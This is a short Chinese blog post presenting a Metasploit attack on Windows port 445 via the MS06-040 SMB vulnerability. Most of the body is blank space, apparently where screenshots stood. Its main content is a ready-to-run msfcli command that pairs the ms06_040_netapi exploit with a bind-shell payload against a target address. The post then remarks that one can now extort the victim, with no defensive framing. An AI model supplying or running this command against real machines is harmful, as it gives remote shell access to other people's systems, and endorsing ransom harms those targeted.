打赏

MetaSploit攻击实例讲解------攻击445端口漏洞(kali linux 2016.2(rolling))(详细)

 

 

 

  不多说,直接上干货!

 

   大家,相信最近的这个事件,对于445端口已经是非常的小心了。勒索病毒

 

 

  445端口是一个毁誉参半的端口,有了它我们可以在局域网中轻松访问各种共享文件夹或共享打印机,但也正是因为有了它,黑客们才有了可乘之机,他们能通过该端口偷偷共享你的硬盘,甚至会在悄无声息中将你的硬盘格式化掉!

 

 

   

 

 

 

 

 

 

 

 

 

 

 

 

 

  这个ms06_040

 

 

 

 

 

 

 

 

 

 

  msfcli  exploit/windows/smb/ms06_040_netapi   PAYLOAD=windows/shell/bind_tcp   RHOST=192.168.0.4   E

 

 

   然后,就成功可以勒索啦!

 

posted @ 2017-05-22 22:40  大数据和AI躺过的坑  阅读(30050)  评论(0编辑  收藏  举报